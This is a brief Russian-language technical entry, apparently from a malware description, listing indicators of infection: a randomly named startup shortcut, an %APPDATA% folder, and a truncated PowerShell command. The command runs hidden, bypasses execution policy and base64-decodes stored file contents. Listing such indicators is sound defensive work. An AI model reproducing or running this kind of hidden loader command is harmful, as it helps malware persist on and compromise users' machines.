Техническая информация
- %APPDATA%\microsoft\windows\start menu\programs\startup\tflzgdqixbjd.lnk
- %APPDATA%\tflzgdqixbjd
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -WINDOWsTYLE hIDDen -ExecUtioNPOLicy BYpasS -coMmAnd "$a99fa8ae80e4a2b57b6d7986484af=[SysTEM.conVErt]::fROMbase64STrInG([SystEM.TexT.EncOdINg]::utf8.GeTSTRing([SYsTem.iO.FILE]::REadAlLbyTeS('%A...